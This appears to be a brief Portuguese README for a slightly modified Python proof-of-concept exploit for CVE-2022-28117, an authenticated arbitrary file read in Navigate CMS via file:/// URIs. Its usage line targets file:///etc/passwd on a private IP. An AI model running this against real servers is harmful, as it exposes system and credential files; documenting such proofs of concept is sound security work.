
Exploit de prova de conceito para CVE-2022-28117 que permite leitura arbitrária de arquivos via esquema de URI file:/// no Navigate CMS, com suporte a autenticação.
PoC python ligeiramente modificado
Uso: python3 .\poccve2022-28117.py -x file:///etc/passwd -u [username] -p [password] http://192.168.148.140/navigate